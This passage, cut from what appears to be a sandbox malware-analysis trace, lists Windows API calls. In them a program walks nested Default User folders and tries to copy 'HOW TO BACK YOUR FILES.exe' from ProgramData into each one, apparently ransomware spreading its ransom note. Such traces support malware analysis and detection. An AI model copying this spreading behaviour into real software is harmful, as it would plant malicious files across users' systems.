lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.597] CloseHandle (hObject=0x118) returned 1 [0042.597] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.597] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.598] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0042.598] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0042.598] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.599] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.599] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.599] GetLastError () returned 0x0 [0042.599] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.599] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.599] CloseHandle (hObject=0x118) returned 1 [0042.599] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.599] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a44a0e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.600] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0042.600] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0042.600] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.600] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.600] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.600] GetLastError () returned 0x0 [0042.600] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.600] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.601] CloseHandle (hObject=0x118) returned 1 [0042.601] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.601] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a4bc500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a4bc500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.601] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0042.601] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0042.601] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.601] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\x9ohk109\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.602] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.602] GetLastError () returned 0x0 [0042.602] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.602] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.602] CloseHandle (hObject=0x118) returned 1 [0042.602] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.602] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a4e2660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a4e2660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.602] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0042.602] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0042.602] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.602] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\rijuql1c\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.603] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.603] GetLastError () returned 0x0 [0042.603] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.603] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.603] CloseHandle (hObject=0x118) returned 1 [0042.603] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.603] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.604] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0042.604] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0042.604] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.604] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\pmmr5k9k\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.604] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.604] GetLastError () returned 0x0 [0042.604] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.604] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.604] CloseHandle (hObject=0x118) returned 1 [0042.605] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.605] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.605] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0042.605] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0042.605] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.605] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\mm5o9xqs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.605] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.605] GetLastError () returned 0x0 [0042.606] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.606] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.606] CloseHandle (hObject=0x118) returned 1 [0042.606] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.606] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.606] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft" [0042.606] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft" [0042.606] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.606] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.607] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.607] GetLastError () returned 0x0 [0042.607] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.607] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.607] CloseHandle (hObject=0x118) returned 1 [0042.607] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.607] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a6392c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.607] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0042.607] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0042.607] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.607] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows sidebar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.608] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.608] GetLastError () returned 0x0 [0042.608] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.608] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.608] CloseHandle (hObject=0x118) returned 1 [0042.608] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.608] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.609] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0042.609] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0042.609] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR 